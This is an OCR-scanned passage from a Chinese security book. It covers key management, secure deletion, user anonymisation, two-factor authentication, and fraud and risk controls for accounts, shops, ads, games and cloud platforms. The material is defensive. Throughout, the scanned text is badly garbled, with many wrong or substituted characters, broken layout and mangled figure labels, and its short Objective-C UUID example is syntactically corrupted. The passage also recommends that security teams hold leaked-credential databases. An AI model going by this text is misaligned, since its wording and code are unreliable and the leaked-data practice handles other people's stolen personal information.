在 海量 用 户 服务 体系 下 的 密 钥 管理 需要 解决 儿 个 方面 的 问题 : 


:单一 的 密 钥 无 法 文 持 海 量 架构 ， 必 须 是 多 级 层级 密 钥 体系 。 


文 持 密 钥 的 全 生命 周期 管理 : 创建、 激活 、 共 用、 转换 (创建 新 
的 密 钥 对 当前 时 间 总 以 后 的 数据 进行 加 解密 ， 保 存 老 的 密 钥 用 以 解密 
过 去 用 该 密 钥 加 密 的 数据 ， 在 加 密 数 据 中 标记 对 应 的 密 钥 版 本 以 通知 
KMS 用 哪个 密 钥 来 解密 ) 、 分 发 、 备 份 、 销 毁 。 


-物理 安全 防止 云 平台 厂商 ，IDC 托 管 方 读 取 密 钥 。 


理论 上 ， 在 云 计算 环境 中 ， 如 果 没 有 使 用 基于 密 钥 的 数据 加 密 ， 
且 对 密 钥 信 任 与 存储 设备 (HSM) 拥有 完全 的 控制 权 ， 都 不 能 保障 数 
据 安全 和 隐私 泄露 的 问题 。 


146 ”安全 删除 


对 于 加 密 数 据 或 加 密 文 件 系统 ， 不 需要 删除 数据 ， 只 需要 使 用 安 
全 的 方法 删除 加 密 窗 钥 ， 对 于 非 加 密 数 据 ， 需 要 使 用 安全 的 方法 不 仅 
格式 化 元 数据 ， 而 且 还 要 重 写 数 据 块 ， 物 理 上 可 以 使 用 消 磁 等 手段 。 


14.7 ”匿名 化 


互联 网 环境 里 广告 和 推荐 系统 都 依赖 于 跟踪 用 户 偏好 和 历史 行为 
做 推荐 ， 风 控 和 业务 数据 控 据 类 的 BI 系统 也 需要 跟踪 用 户 行 为 ， 如 设 
备 指纹 、cookie、 帆 布 指纹 等 各 种 技术 都 可 以 用 来 跟 蹊 用户 ， 在 互联 
网 尤其 是 移动 互联 网 环境 下 ， 很 多 时 候 实 际 上 并 不 需要 确切 的 用 户 名 
束 能 跟 踩 到 这 个 人 ， 假 如 你 手机 的 无 线 网 卡 的 MAC 地 址 二 固 定 不 变 
的 ， 那 无 论 何 时 何 地 ， 只 要 看 到 这 个 MAC 地 址 吏 知 道 你 大 概 在 什么 地 
re 
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产品 设计 理念 ， 例 如 苹果 用 一 个 UUID (Universally Unique Identifier, 
通用 唯一 识别 码 ) 作为 用 户 标识 ， 如 下 代码 所 示 : 


-(NSString*) uuid 


{ 
1. CFUUIDRef puuid = CFUUIDCreate( nil ); 
2. CFStringRef uuidString = = CFUUIDCreateString( nil, puuid ); 
3. NSString * result = (NSString*)CFStringCreateCopy( NULL, uuidString); 
4. CFRelease(puuid); 
5. CFRelease(uuidString); return 


[result autorelease]/; 
6. } 


App 用 这 个 UUID 跟 蹊 用 户 访问 、 付 费 行为 。 对 于 不 同 的 App， 即 
使 是 同一 个 用 户 UUID 的 值 也 是 不 同 的 ， 并 且 重 新 安 帮 同一 个 App 时 会 


再 生成 狐 的 UUID 的 值 ， 这 样 做 是 为 了 尽 可 能 地 避免 通过 “拼图 ”来 竣 出 
这 个 用 户 完 整 的 偏好 ， 也 避免 了 再 注册 一 人 裔 用 户 名 密码 等 信息 。 
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在 应 用 系统 对 访问 者 只 通过 单 因素 认证 ， 而 不 是 通过 多 因素 认证 
充分 鉴 权 的 情况 下 ， 只 对 其 开放 有 限 的 数据 ， 对 于 隐私 相关 的 重要 数 
据 只 有 通过 完整 的 多 因素 认证 或 者 基于 风 控 系统 的 判断 为 可 信访 问 时 
才 开 局 ， 苹 末 iCloud 的 一 个 例子 ， 如 图 14-10 所 示 。 


首先 账户 要 启用 2FA， 当 启用 2FA 后 ， 即 使 攻击 者 取得 了 账户 的 口 
令 直 接 登 示 iCloud， 也 会 看 到 如 下 界面 ， 邮 件 、 通 讯 孙 、 照 片 等 均 显 示 
为 上 锁 不 可 访问 的 状态 ， 如 图 14-11 所 示 。 


局 用 两 步 验证 


要 启用 两 步 验 证 ， 您 必须 接受 以 下 条 件 : 


局 用 两 步 验证 后 : 
。 您 需要 使 用 以 下 其 中 两 种 方式 来 管理 您 的 Apple ID: 密码 、 受 信任 设备 或 恢复 
密 钥 。 


。 如 果 您 忘记 密码 ， 您 将 需要 恢复 密 钥 和 受信 任 设备 来 重 设 密码 。Apple 不 能 代 
您 重 设 密 码 。 


。 您 需要 使 用 App 专用 密码 登录 任何 非 Apple 提供 的 App 和 服务 。 
。 您 必须 自行 负责 妥善 保管 您 的 恢复 密 钥 。 


Y 我 已 了 解 上 述 条 件 。 


取消 | 局 用 两 步 验证 


图 14-10 ”Apple 账 户 启用 2FA 验 证 界面 


a 请 验证 您 的 身份 以 访问 iCloud. al Aerie 
您 仍然 可 以 使 用 " 间 找 我 的 iPhone" 对 丢失 的 设备 进行 定位 。 
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图 14-11 未 通过 2FA 认 证 时 无 法 访问 敏感 数据 


这 种 方式 可 防止 一 般 程 度 的 口令 失窃 、 撞 库 、 扫 号 引发 的 盗号 问 
题 ， 这 会 比较 好 地 保护 隐私 。 


参考 资料 
AWS Security Best Practices 


http://media.amazonwebservices.com/AWS_Security_Best_Practices.p 


df 
Securing Data at Rest with Encryption 


http://media.amazonwebservices.com/AWS_Securing_Data_at_Rest_w 


ith_Encryption.pdf 


Disk encryption 
https://wiki.archlinux.org/index.php/Disk_encryption 
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:第 15 间 ”业务 安全 与 风 控 


:第 16 草 ”大 规模 纵深 防御 体系 设计 与 实现 


:第 17 章 ”分 阶段 的 安全 体系 建设 


第 15 章 ”业务 安全 与 风 欣 


业务 安全 的 起 源 是 由 于 墨 产 的 存在 ， 很 多 年 前 墨 产 束 通过 黑客 入 
侵 ， 拖 库 ， 然 后 卖 数 据 去 赚钱 。 但 现在 随 着 互联 网 承载 的 各 种 业务 的 
兴起 ， 黑 产 鳃 利 的 门槛 开始 降低 ， 不 再 须要 入 侵 了 对 方才 能 套利 ， 仪 
通过 业务 层面 的 漏洞 ， 防 范 不 闫 或 打 法 律 擦边球 束 能 获 利 。 


另 一 方面 ， 企 业 间 的 恶性 竞争 ， 黄 赌 毒 等 合 规 性 要 求 也 成 为 业务 
安全 的 驱动 力 。 


本 章 将 描述 互联 网 行业 各 种 典型 业务 的 主要 风险 和 控制 方法 。 


15.1 对 抗原 则 


在 谈 及 具体 的 风 控 措施 之 前 ， 先 罗列 一 下 业务 安全 的 策略 和 原 
则 ， 具 体 如 下 : 


相对 的 风 控 而 非 绝 对 的 防 因 一 一 业务 安全 的 目标 古 相 对 意义 上 的 
风险 控制 ， 而 不 是 绝对 意义 上 的 防 墨 。 拖 库 只 要 发 生 一 次 驳 非 党 三 
重 ， 但 是 业务 安全 ， 即 使 漏 掉 了 一 些 ， 但 解决 了 大 部 分 的 问题 ， 那 束 
算 及 格 了 。 


增加 黑 产 的 成 本 而 非 阻 断 他 们 的 行为 一 一 黑 产 ， 王 毛 营 的 驱动 力 
忠 古 为 了 僵 利 ， 如 果 他 们 投入 的 成 本 超过 损益 点 ， 那 束 没 必要 再 去 攻 
击 你 。 比 如 注册 一 张 银行 卡 的 成 本 > 获取 一 张 手 机 SIM 卡 的 成 本 > 注册 
一 个 免费 邮箱 的 成 本 。 


永远 的 情报 一 一 知己 知 彼 ， 百 战 不 列 。 了 解 墨 产 怎么 干 活 事 半 功 
倍 ， 深 入 政 后 比 欢 在 办 公 室 更 聪明 ， 并 非 只 有 息 虫 抓 来 的 大 数据 才 叫 
情报 ， 足 在 对 方 的 QQ 群 里 也 能 搞 到 情报 。 


方法 比 技术 更 重要 一 一 上 兵 伐 谋 ,最 下 攻 城 。 技 术 的 对 抗 是 无 止 
尺 的 ， 并 且 会 不 断 地 消耗 内 部 的 研发 货源 和 IDC 资 源 ， 改 变 战 场 规则 
可 能 起 到 一 招 退 敌 的 效果 。 


数据 比 算法 更 重要 一 一 大 数据 的 典型 特征 ， 算 法 可 以 不 高 大 上 ， 
但 是 没有 数据 或 数据 太 少 ， 风 探 这 件 事 也 许 你 玩 不 起 来 。 


惑 能 补 拙 一 一 也 许 你 没有 大 数据 ， 但 是 不 断 地 改变 业务 逻辑 ， 不 
断 地 升级 会 使 对 手 疲 于 奔 命 。 自 PS3/PSV 时 代 起 ，sony 不 再 封 墙 破 
解 ， 而 是 以 更 短 的 迭代 周期 ， 更 高 的 版 本 发 布 频率 升级 操作 系统 ， 狐 
的 游戏 必须 运行 于 高 版 本 系统 之 上 ， 使 破解 者 疲惫 不 堪 ， 盗 版 用 户 都 
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东 ， 则 风 控 起 了 反 效 采 。 同 样 ， 一 家 创业 型 公司 不 太 可 能 有 资源 为 了 
做 风 控 而 仆 遍 整个 ijpv4 的 地 址 库 。 


纵深 防御 一 一 纵深 、 多 维度 、 降 维 防御 在 风 控 场景 仍然 适用 ， 使 
用 漏斗 模型 ， 由 机 器 规则 处 理 最 原始 的 数据 ， 逐 步 沛 选 过 滤 ， 由 人 工 
审核 做 最 后 一 道 防线 。 


杀 允 给 猴 看 一 一 只 要 条 件 允 许 ， 用 法 律 武器 端 掉 主 力 ， 用 风 控 手 
段 扫尾 。2: 8 原则 ， 对 危害 最 大 的 部 分 不 一 定 要 用 常规 手段 ， 无 论 什 
和 土方 法 ， 能 达成 目的 束 好 。 能 在 安全 大 会 上 讲 的 高 大 上 的 方法 不 一 


定 征 解决 问题 性 价 比 最 高 的 手段 。 


人 民 的 战争 一 一 教育 正常 的 用 户 安全 意识 ， 动 用 一 切 资 源 和 手段 
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15.2 账号 安全 


账号 安全 是 所 有 强 账号 体系 应 用 的 基础 ， 强 账号 体系 ， 如 电 商 、 
网 游 、 第 三 方 支付 、 社 交 网 络 、 即 时 通信 等 ， 是 需要 登录 后 产生 数据 
和 交互 的 应 用 ， 而 搜索 、 导 航 、 杀 毒 客 户 闻 不 需要 登录 也 能 用 ， 则 属 
于 弱 账 号 体系 应 用 。 


1. 注 册 


对 于 羊毛 党 而 言 ， 平 时 需要 “ 养 号 ”， 批 量 注册 一 批 豆 放 着 不 用 ， 
等 到 促销 之 类 的 活动 开始 了 才 用 。 垃 圾 注册 、 虚 假 小 号 是 垃圾 抢购 、 
欺诈 钓鱼 的 源头 ， 账 号 安全 要 从 源头 收 基 。 


对 抗 垃圾 注册 一 般 的 手段 包括 : 
图 片 验证 码 
邮件 验证 码 
短信 验证 码 
语音 验证 码 


电话 语 首 验 证 码 


有 些 产品 是 PC 客户 端 ， 或 者 Web 注 册 界 面 不 是 使 用 标准 的 加 密 算 
法 通过 https post 请 求 ， 上 自动 注册 机 需要 模拟 客户 端 协议 才能 工作 ， 逆 问 
的 协议 如 果 经 党 变 化 或 者 复杂 程度 较 高 就 会 成 为 黑 产 研发 的 一 个 门 


DE 


真实 的 新 用 户 如 果 在 注册 时 使 用 了 原来 其 他 网 站 被 拖 库 的 邮件 地 
址 和 相同 的 密码 怎么 办 ? 对 甲 方 安全 团队 而 言 ， 自 己 应 持 有 各 种 社工 
库 ， 并 随时 更 新 ， 在 用 户 注册 时 比 对 社工 库 内 容 ， 如 个 人 注册 信息 相 
同 ， 做 出 风险 提示 或 强制 修改 密码 。 


对 于 使 用 分 布 式 代 理 的 注册 机 ， 如 有 果 有 账号 风 榨 系统 的 可 以 根据 
来 源 属 性 和 机 器 人 行为 特征 标注 恶意 灰 度 ， 从 而 给 与 不 同 级 别 的 验证 
码 。 对 于 产品 线 较 长 的 企业 来 说 ， 一 般 这 个 环节 只 做 检测 ， 不 做 “ 严 
打 ”， 因 为 像 网 游 等 业务 注册 小 号 也 十 正常 的 ， 具 体 打 击 和 封锁 策略 留 
给 更 后 端的 业务 系统 去 做 。 


此 外 ， 对 于 利用 注册 接口 检测 用 户 名 /账号 是 否 存在 的 暴力 枚 举 也 
应 该 做 人 机 识别 。 以 防止 批量 得 到 账号 信息 用 于 批量 扫 号 等 动作 。 
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对 于 大 型 平台 而 言 ， 登 录 的 入 口 往 往 不 止 一 个 ， 且 除了 Web 还 有 其 
他 的 协议 入 口 ， 例 如 POP3、 手 机 APP 等 ， 尽 可 能 使 入 口 统 一 ， 以 便于 
做 集中 管控 。 


使 用 风 控 系统 对 比 用 户 画 像 检 测 登 录 地 域 来 源 、IP 属 性 、 可 信 设 
备 、 登 录 频 率 、 代 理 使 用 习惯 等 从 而 推送 不 同 复杂 等 级 的 验证 码 或 开 
启 多 因素 认证 。 或 根据 离线 数据 ， 即 一 段 时 间 内 的 请 求 (行为 ) 异 
常 ， 以 及 其 他 业务 风 控 子 系统 判断 的 行为 异常 ， 再 调用 风 控 的 接口 推 
送 二 次 认证 要 求 做 人 机 识别 ， 如 图 15-1 所 示 。 


其 他 业务 风 控 


事前 : 判断 用 户 风 
险 等 级 ， 根 据 需 要 z 
| 出 二 次 验证 。 事 中 ， ESAERA i 离线 风 控 引擎 
设备 指纹 + 让 已 登录 的 高 风险 
,行为 特征 用 户 重新 验证 
实时 风 控 引擎 
阔 值 开关 十 | 
基础 策略 。 ， D 
1 风险 
浏览 器 7 SSO 服务 器 注册 / Pa 
JS 指数 简单 验 = 登陆 /密码 找 回 j 高 速 缓存 ~ 


证 码 no 
机 验 ! | 设备 指纹 ”到 信誉 库 ” 社工 库 HPR ， 
-en = | 


图 15-1 账号 风 控 架构 示意 图 


对 于 大 规模 的 扫 号 、 烘 力 破解 ， 除 了 依赖 于 机 器 规则 外 ， 还 应 准 
备 手工 策略 和 应 急 预 案 。 


风 控 服务 依赖 于 很 多 数据 ， 例 如 设备 指纹 、IP 信 誉 库 、 黑 产 手机 
号 等 ， 获 取 这 些 数 据 旦 一 个 比较 庞大 的 工程 ， 对 于 大 型 企业 而 言 相 对 
容易 获取 ， 中 小 企业 在 不 借助 第 三 方 数据 合作 的 情况 下 ， 目 己 去 抓 取 
数据 成 本 会 非常 高 。 


3. 密 你 /密码 找 回 


QQ 的 密 保 功能 如 图 15-2 所 示 。 


首 移 平台 应 提供 多 种 密码 保护 手段 ， 并 在 用 户 界面 显 眼 处 提示 或 
安全 教育 。 其 次 ， 应 确保 平台 的 密码 找 回 / 密 码 重 置 等 功能 不 存在 逻辑 
漏洞 可 以 被 绕 过 ， 或 发 生 过 度 信 息 披 露 。 账 户 展现 本 身 不 应 该 存在 可 
以 被 人 息 虫 抓 取 聚 合 后 用 于 撞 库 或 暴力 破解 的 信息 。 


在 认证 设备 之 间 提 供 异 地 登录 拓 醒 、 异 第 登录 提醒 、 破 解 账号 提 
醒 。 对 密码 找 回 业 务 进行 人 机 识别 ， 防 止 批 量 找 回 、 密 码 重 置 等 接口 
的 机 融 行 为 。 


4. 多 因素 认证 


重要 的 操作 必须 使 用 2FA 〈 双 因素 认证 ) 或 MFA 〈 多 因素 认证 ) ， 
例如 密码 找 回 、 密 码 重 置 、 安 装 证 书 等 。 记 得 某 大 型 电 商 平台 安装 证 
书 不 需要 二 次 认证 ， 所 以 他 们 的 大 BOSS 站 在 台 上 被 消费 者 问 及 盗号 问 
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图 15-2 QQ 的 密 保 功能 


前 段 时 间 某 三 邮箱 账号 疑似 拖 库 ， 引 发 了 大 量 的 iCloud 账 户 被 盗 ， 
没有 开启 2FA 的 用 户 被 彻底 控制 ， 手 机 被 iCloud 远 程 锁 定 ， 不 交 钱 就 直 
接 远 程控 除数 据 ，IOS 欣 数据 是 直接 探 加 密 文 件 系统 的 密 钥 ， 基 本 不 可 


5. 多 设备 登录 


多 设备 登录 时 ， 应 保证 同 平 台 不 能 “ 串 号 ”一 一 同一 账号 可 以 在 PC 
端 和 APP 站 同 时 登录 ， 但 不 能 在 两 个 PC 端 登 孙 同 一 账号 ， 或 不 同 的 手 
持 设备 上 登录 同一 账号 \iCloud 这 种 可 以 在 iPhone 和 iPad 同 时 登录 ， 为 
不 同 设备 间 共 享 和 同步 数据 而 设计 的 账户 体系 除外 ) ， 如 果 在 另 一 


PC 上 登录 同一 账号 ， 前 一 个 将 被 强制 喝 下 线 ， 或 前 一 个 设备 体 持 登录 
状态 ， 第 二 次 登录 请 求 由 户主 的 认证 设备 通过 2FA 之 后 才能 登录 ， 再 将 
前 者 踊 下 线 。 


多 设备 同时 登录 时 应 支持 交叉 认证 ， 例 如 PC 端的 可 疑 登 录 自 动 发 
起 2FA 请 求 到 手机 端 ， 经 由 手机 端 确认 后 才能 从 PC 端 登录 。 微 信 的 设 
计 如 图 15-3 所 示 。 
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Windows 微 信 已 登录 


手机 消息 免 扰 


退出 Windows 微 信 


图 15-3” 微 信和 多 设备 登录 界面 


6. 账 号 共 至 体系 


绝 大 多 数 互 联网 平台 都 采用 SSO 的 账号 共享 体系 ， 在 开放 平台 业务 
上 使 用 Oauth、Openid 等 联合 认证 协议 。 一 方面 Oauth 等 协议 坑 比 较 多 ， 
非常 容易 出 问题 ， 另 一 方面 内 部 在 对 账户 数据 的 使 用 上 也 容易 不 遵守 


规范 ， 过 度 共享 和 滥用 账户 数据 ， 这 些 都 需要 在 相关 的 应 用 安全 开发 
标准 中 约束 。 


大 型 平台 一 般 有 很 多 应 用 ， 和 凭借 一 个 登录 token 直 接 无 障碍 登录 所 
有 子 应 用 在 安全 上 并 不 是 一 个 好 的 设计 ， 一 旦 被 XSS 盗 取 token 束 相当 
于 全 线 溃 防 。 所 以 在 功能 和 应 用 入 口 比 较 多 的 平台 ， 会 对 业务 划 权 
重 ， 分 类 分 级 ， 涉 及 个 人 认证 信息 、 个 人 隐私 、 文 付 类 的 一 般 属于 高 
级 Web 安 全 域 ， 信 息 发 布 类 的 归 入 一 般 Web 域 。 对 高 安全 域 的 应 用 ， 登 
SKER T SSO token 之 外 ， 引 入 第 二 层 认 证 的 secure token， 黑 客 光 有 一 个 
token 登 未 不 了 重要 应 用 ， 只 有 两 个 token 齐 备 才 可 以 继续 登 示 。 安 全 人 研 
RA d4rkwindS<ilsecure token 的 一 个 例子 ， 如 图 15-4 所 示 。 


| 统一 登录 分 散 认 证 


用 户 访问 产品 线 ) 
心思 想 
p, Cookie 中 是 否 核心 
~ 有 BDUSS © BDUSS+STOKEN, BDUSS 共用 ， 
[ STOKEN 分 散在 重工 产品 线 
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| ee Cookie 中 是 否 i 
| 有 STOKEN 
y 
+ 
人 - 向 session 服 务 器 查询 
< 查询 结果 判定 


Aj15-4 某 互联 网 公司 SSO 登 未 流程 


注 : BDUSS 是 SSO token，STOKEN 是 secure token，LOGA 是 一 个 
用 户 跳 转 的 接口 ， 跳 转 到 passport (RUSSO) ， 正 常用 户 passport 域 下 肯 
定 有 STOKEN，LOGA 成 功 后 会 给 原 域名 STOKEN， 所 以 只 需要 跳 转 就 
可 以 安全 登录 而 无 需 输入 密码 。 这 个 方案 会 比 一 般 的 单 点 登录 多 一 次 
跳 转 ， 但 对 用 户 基本 无 感知 ， 这 样 做 完全 不 显得 激进 。 


15.3 PAX 


电 商 是 互联 网 行业 中 走 得 比较 靠 前 的 行业 ， 在 当下 互联 网 + 和 0O2O0 
时 代 比 较 热 门 ， 因 为 跟 钱 强 相 关 ， 所 以 也 促成 了 一 系列 的 业务 安全 问 
题 。 这 一 市 名 为 电 商 ， 实 际 上 把 广义 上 涉及 在 线 交 易 的 都 算 进 去 了 ， 
比如 OTA 在 线 旅 游 代理 这 些 都 统统 纳入 电 商 的 范畴 。 


恶意 下 单 
Lae. 


跟 syn-flood 神 似 ， 担 下 商品 但 不 付款 ， 虽 在 侵占 库存 ， 一 般 的 对 
策 征 高 峰 时 段 下 单 使 用 验证 码 ， 下 单 后 一 段 时 间 不 付款 订单 目 动 失 
效 ， 限 制 下 单 频 率 ， 有 风 控 数据 源 可 以 对 恶意 账户 进行 标记 ， 冻 绪 
BA o 


2.58 Fi 


黄牛 一 般 事 前 批量 注册 小 号 ， 抢 购 前 准备 好 抢 单机 器 人 程序 ( 黑 
色 产 业 链 中 间 环 节 也 有 码 农 的 参与 ) ， 如 图 15-5 所 示 ， 抢 购 开 始 时 犹 
AIS T CCL ° 
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对 于 恶意 养 号 ， 风 控 系 统一 般 会 根据 小 号 、 人 僵尸 号 平时 的 行为 与 
正常 账户 的 区 别 标注 、 登 录 的 途径 、 登 录 地 域 、 登 录 设 备 指纹 、 收 货 
地 址 来 分 类 标记 ， 抢 购 开始 前 就 能 在 账号 层面 冻结 挥 。 


在 活动 开启 前 如 果 抢 单程 序 是 针对 既 有 页 面 逻 辑 的 ， 可 以 临时 更 
换 业 务 逻 辑 使 抢 单 程序 失效 。 在 抢购 过 程 会 使 用 验证 码 做 人 机 识别 。 


3. 刷 优惠 券 和 奖励 


首先 要 在 账号 层面 根据 大 数据 标记 账户 恶意 灰 度 ， 其 次 优惠 券 跟 
账号 绑 定 ， 无 法 流通 和 交易 。 跟 网 游 中 的 经 济 体系 数值 类 似 ， 建 立 阶 
梯 模 型 ， 给 优质 账户 高 额 回 馈 ， 给 低 信誉 账户 小 额 优 惠 。 


4. 反 价格 仆 虫 


价格 息 虫 主要 是 竞争 对 手 比 价 。 但 凡是 扑 虫 束 有 疏 虫 的 特征 ， 比 
如 的 虫 所 在 的 IP 段 ， 同 时 爬虫 不 是 正常 的 浏 哎 絮 ， 可 能 不 会 解析 
JavaScript， 缺 少 正 第 的 浏 咒 絮 客户 问 行 为 和 通信 ， 所 以 通过 这 个 做 人 
机 识别 跟 DDoS 中 的 CC 攻击 有 点 类 似 。 


5. 反 期 诈 


根据 账户 注册 信息 的 真实 性 、 登 录 设 备 的 真实 性 、 绑 卡 异 常 、 账 
号 异 稼 ， 结 合 目 有 或 第 三 方 历史 征 信 数据 综合 判断 欺诈 的 可 能 性 。 依 


赖 于 大 数据 的 反 欺 诈 对 数据 源 的 要 求 比较 高 ， 绝 大 多 数 中 小 企业 目 建 
数据 产 不 太 具 有 可 行 性 ， 初 期 还 应 该 依仗 大 平台 开放 的 基础 数据 能 
做 定制 分 析 ， 并 逐步 积累 自己 的 业务 数据 ， 等 自身 业务 数据 积累 到 一 
定 规模 时 再 考虑 目 建 风 控 机制。 


6. 信 息 泄 露 


言 思 泄露 有 几 大 来 产 ， 扩 库 、 用 户 信息 过 度 展 现 和 披露 、 开 放 乎 
台 API 造 用、 供应 链 上 下 族人 信息 泄露 , “内 昂 ? 兜 售 内 部 数据 。 


目前 隐私 保护 在 国内 尚 不 成 气候 ， 很 多 公司 有 安全 开发 标准 ， 却 
没有 隐私 保护 标准 ， 所 以 对 数据 的 分 类 分 级 ， 加 密 脱 敏 等 几乎 没有 通 
用 的 约束 。 而 对 客户 元 数据 的 访问 权限 ， 内 部 的 信息 安全 管理 ， 基 本 
上 都 只 有 成 熟 的 大 公司 才 会 考虑 。 


对 于 野 蛋 成 长 期 的 创业 型 公司 强调 这 个 可 能 有 点 难 ， 但 对 于 已 有 
安全 团队 的 企业 ， 这 应 该 纳入 安全 负责 人 的 视野 之 中 。 


7.305 NPE 


交易 风 探 依赖 于 几 个 方面 : 


RARE 

3) 认证 机 制 

-证书 PKI 

- 令 牌 

:多 因素 认证 

4) 风险 评估 

:账户 历史 行为 

:账户 历史 征 信和 数据 
:交易 和 账户 异常 

-漏斗 模型 筛选 ， 机 器 规则 + 人 工 审 核 


交易 风 控 在 传统 安全 (包括 认证 、 账 户 、KMS、PKI、 客 户 端 完 
整 性 等 ) 基础 上 还 需要 由 3 大 组 成 部 分 


用 户 数据 、 交 易 数 据 。 


来 目 传统 金融 行业 的 风险 管理 。 


-基于 大 数据 的 风 控 平台 。 


交易 风 探 团队 需要 两 氢 人 : 一 拨 来 目 传统 金融 行业 ， 一 拨 来 目 互 
联网 。 


aAa J ee 


因为 点 击 欺诈 非 党 请 重 ， 数 据 作 假 水 分 很 高 ， 所 以 目前 都 是 按 广 
告 效 果 、 实 际 订单 效 果 收 费 ， 以 前 的 CPM 、CPC 模 式 都 不 行 ， 基 本 都 
古 CPA 为 主 , 但 是 即便 是 CPA， 广 告 联盟 有 时 候 还 是 跟 黑 产 玩 一 样 
的 ， 会 假装 正 稼 用 户 注册 登录 然后 充值 ， 甚 至 小 量 消费 ， 只 要 这 些 充 
值 消费 低 于 它 所 获取 的 广告 费 它 束 是 赚 的 ， 因 此 对 于 这 类 行为 的 打假 
也 需要 依靠 账号 标签 以 及 对 用 户 行为 模式 的 数据 分 析 来 获取 。 


15.5 ”媒体 类 


媒体 类 的 问题 主要 是 黄 财 毒 、 与 情 安 人 全。 基础 的 手段 包括 : 敏感 
字 过 滤 、 设 置 举报 功能 、 加 上 人 工 审核 。 高 级 的 手段 本 质 上 天 是 搜索 
引擎 的 技术 : 抓 取样 本 ， 用 机 器 学 习 的 方法 做 特征 识别 。 


15.6 ”网游 类 


游戏 行业 除了 盗号 盗 充 外 ， 最 主要 的 问题 瓯 是 反 外 挂 、 私 服 、 打 
金工 作 宝 。 总 结 一 下 有 几 个 层面 的 保护 手段 : 


客户 问 一 一 对 于 fash 等 瘦 客 户 端 最 主要 的 技术 是 代码 混 消 ， 用 于 
对 抗 反 编译 后 逆向 游戏 的 逻辑 和 网 络 协 议 。 对 于 大 型 客户 端 游戏 ， 对 
抗 的 方式 主要 是 加 密 加 这 ， 以 及 各 种 二 进 制 反 调试 手段 。 


:网 络 封包 一 一 对 抗 重 放 型 攻击 ， 具 体 实 现 方式 可 以 参考 大 多 数 rest 
API 的 安全 设计 如 何 防 J 上 packet replay 攻 击 ， 原 理 基本 类 似 。 


:服务 问 校 验 一 一 把 大 部 分 逻辑 验证 放 在 服务 端 ， 同 时 校 验 时 钟 同 


aren 


步 等 j 

:人 机 识别 一 一 通过 定期 弹出 验证 码 或 回答 问题 实现 前 端的 人 机 识 
别 ， 后 端 根 据 地 图 移动 轨迹 ， 鼠 标 轨 人 迹 ， 物 品 使 用 速度 等 做 人 机 识 
别 。 


产品 内 容 设计 一 一 物品 与 账号 绑 定 ， 如 独 15-6 所 示 ， 随 时 间 降 低 
收益 ， 内 部 经 济 乎 衡 数值 体 系 ， 游 戏 内 产 出 利益 分 配 倾 癌 性 等 对 抗 打 
金工 作 室 对 游戏 内 部 环境 的 污染 。 
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运营 数据 ， 如 虚拟 装备 产 出 数量 ， 个 人 成 


-私服 一 一 主要 的 根源 在 于 供应 链 管 理 ， 研 发 到 运营 的 交付 过 程 ， 
研发 的 信息 安全 管理 ， 运 营 平 台 的 防 黑 建设 ， 人 研发 团队 集体 跳 横 的 知 
识 产权 保护 ， 主 创 人 员 敏感 异动 预警 ， 竞 业 协 议 ， 保 密 协议 等 。 


安全 模式 


为 了 更 好 的 保护 广大 玩家 的 虚拟 物品 安全 ， 我 们 推出 了 新 的 安全 策略 

“及 讯 游戏 安全 模式 ” 当 您 的 帐号 处 于 高 风险 状态 时 ， 和 将 会 自动 进入 
安全 模式 。 在 此 模式 下 ， 您 的 帐号 不 可 进行 包括 交易 、 丢 弃 、 销 蜂 在 
内 的 所 有 涉及 到 帐号 虚拟 物品 的 操作 ~ 


帐号 异常 查询 > ” 解除 安全 模式 > 


图 15-6 网游 中 的 虚拟 物品 绑 定 


游戏 是 将 互联 网 用 户 流量 转化 为 金钱 变现 能 力 最 强 的 业务 ， 故 而 
黑 产 的 分 工 也 比较 成 熟 ， 所 以 对 抗 上 也 需要 各 种 情报 ， 姑 且 不 去 加 上 
威胁 情报 的 大 帽子 了 ， 这 是 一 个 需要 发 动 广大 群众 进行 持久 对 抗 的 大 
课题 。 


15.7 云 计 算 


这 里 站 在 云 计算 平台 厂商 的 角度 来 看 ， 而 不 是 站 在 租户 的 立场 上 
看 的 。 主 要 问题 是 CaaS (Crime as a service) ， 云 平台 被 当做 犯罪 的 场 
所 ， 除 黄 赌 毒 外 ， 很 多 虚拟 机 实例 被 植 入 木马 变 成 “ 养 鸡 场 ”， 伪 尸 网 
络 的 集中 地 ， 频 繁 的 DDoS 其 他 IDC， 或 用 于 暴利 密码 破解 等 网 格 计算 
行为 。 

对 于 云 平 台 的 监管 ， 一 方面 手 不 能 伸 得 太 长 ， 触 及 用 户 隐 私 数 
据 ， 一 方面 又 要 做 治理 。 对 于 租户 使 用 云 平台 开展 黄 赌 毒 业务 的 ， 可 
以 参考 媒体 类 的 解决 方案 。 而 “ 养 鸡 场 ”这 类 问题 ， 纯 粹 是 一 个 租户 级 
的 整体 安全 防护 能 力 ， 基 于 网 络 的 异常 流量 分 析 。 对 于 使 用 云 资 源 跑 
彩虹 表 又 不 公开 提供 服务 的 行为 而 言 ， 目 前 似乎 没有 太 好 的 检测 手 


段 。 


云 计算 作为 一 个 公共 平台 ， 上 层 业 务 可 能 会 窗 盖 全 行业 全 类 型 ， 
滋生 的 问题 可 能 层出不穷 ， 在 提供 安全 解决 方案 以 外 ， 如 何 为 租户 的 
风 控 提供 便利 是 一 个 长 期 而 有 挑战 的 课题 。 


第 16 章 ”大 规模 纵深 防御 体系 设计 与 实现 


技术 篇 中 对 大 型 互联 网 生产 网 络 的 安全 解决 方案 分 类 进行 了 摘 
述 ， 但 对 于 具体 公司 的 安全 建设 如 何 上 手 可 能 很 多 人 还 是 缺乏 对 整体 
架构 和 切入 点 的 认 知 ， 本 革 通 过 具体 的 例子 展示 如 何 进 行 整体 化 安全 
建设 ， 以 及 从 哪里 入 手 由 点 带 面 的 布局 ， 并 最 终 实现 体系 化 建设 需要 
的 大 部 分 任务 。 


16.1 设计 方案 的 考虑 


仿 测 和 防护 的 角色 


很 多 人 提 到 一 个 问题 , “既然 是 纵深 防御 ， 好 像 入 侵 检测 的 部 分 居 
多 ， 而 防护 的 部 分 比较 少 ”， 这 确实 是 目前 大 型 互联 网 安全 体系 的 现 
状 。 因 为 安全 手段 要 适应 业务 ， 必 须 有 所 妥协 ， 而 不 能 只 以 安全 效果 
最 大 化 来 衡量 。 所 以 本 着 为 业务 让 路 的 原则 ， 最 后 就 变 成 检测 手段 很 
多 ， 阻 断 手段 一 般 不 轻易 用 。 在 BAT 这 样 的 业务 模式 中 ， 广 义 上 的 Web 
服务 占 了 绝 大 多 数 ， 所 以 很 多 场景 下 阻 断 的 安全 手段 束 变 成 了 WAF， 
